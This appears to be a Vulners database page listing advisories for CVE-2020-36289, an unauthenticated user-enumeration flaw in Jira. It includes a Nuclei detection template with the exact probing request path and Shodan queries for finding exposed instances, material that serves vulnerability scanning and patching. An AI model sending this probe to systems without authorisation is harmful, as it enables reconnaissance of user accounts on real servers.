| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| User Enumeration via /QueryComponentRendererValue!Default.jspa endpoint - CVE-2020-36289 | 16 Sep 202003:08 | – | atlassian | |
| User Enumeration via /QueryComponentRendererValue!Default.jspa endpoint - CVE-2020-36289 | 16 Sep 202003:08 | – | atlassian | |
| CVE-2020-36289 | 11 Jun 202112:18 | – | circl | |
| Atlassian JIRA Server 和 Atlassian JIRA Data Center 信息泄露漏洞 | 12 May 202100:00 | – | cnnvd | |
| Atlassian JIRA Information Disclosure Vulnerability (CNVD-2021-43373) | 10 Jun 202100:00 | – | cnvd | |
| CVE-2020-36289 | 12 May 202103:30 | – | cve | |
| CVE-2020-36289 | 12 May 202103:30 | – | cvelist | |
| Atlassian JIRA < 8.5.15 / 8.6.x < 8.13.7 / 8.14.x < 8.17.0 Unauth User Enum (JRASERVER-71559) | 13 Oct 202100:00 | – | nessus | |
| Atlassian Jira Unauthenticated User Enumeration (CVE-2020-36289) | 13 Oct 202100:00 | – | nessus | |
| Atlassian Jira < 8.5.15 Multiple Vulnerabilities | 2 Jul 202100:00 | – | nessus |
id: CVE-2020-36289
info:
name: Jira Server and Data Center - Information Disclosure
author: dhiyaneshDk
severity: medium
description: Jira Server and Data Center is susceptible to information disclosure. An attacker can enumerate users via the QueryComponentRendererValue!Default.jspa endpoint and thus potentially access sensitive information, modify data, and/or execute unauthorized operations, Affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
impact: |
An attacker can gain access to sensitive information, potentially leading to further attacks.
remediation: |
Apply the necessary patches or updates provided by Atlassian to fix the vulnerability.
reference:
- https://twitter.com/ptswarm/status/1402644004781633540
- https://jira.atlassian.com/browse/JRASERVER-71559
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
- https://github.com/ARPSyndicate/cvemon
- https://github.com/StarCrossPortal/scalpel
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-36289
cwe-id: CWE-863
epss-score: 0.99209
epss-percentile: 0.99929
cpe: cpe:2.3:a:atlassian:data_center:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: atlassian
product: data_center
shodan-query:
- http.component:"Atlassian Jira"
- http.component:"atlassian jira"
tags: cve,cve2020,jira,atlassian,unauth,vuln
http:
- method: GET
path:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'rel=\"admin\"'
- type: word
part: header
words:
- 'application/json'
- type: status
status:
- 200
# digest: 490a004630440220690b9c466df048b3d52d316e8deaed208bcf09ac3a01fc3b8ddb19d7df15b62902206c6b1b35fb039392cf5f7c175a27f0fdfd4c5c5bbce84fdbf87c24b114a2c45f:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation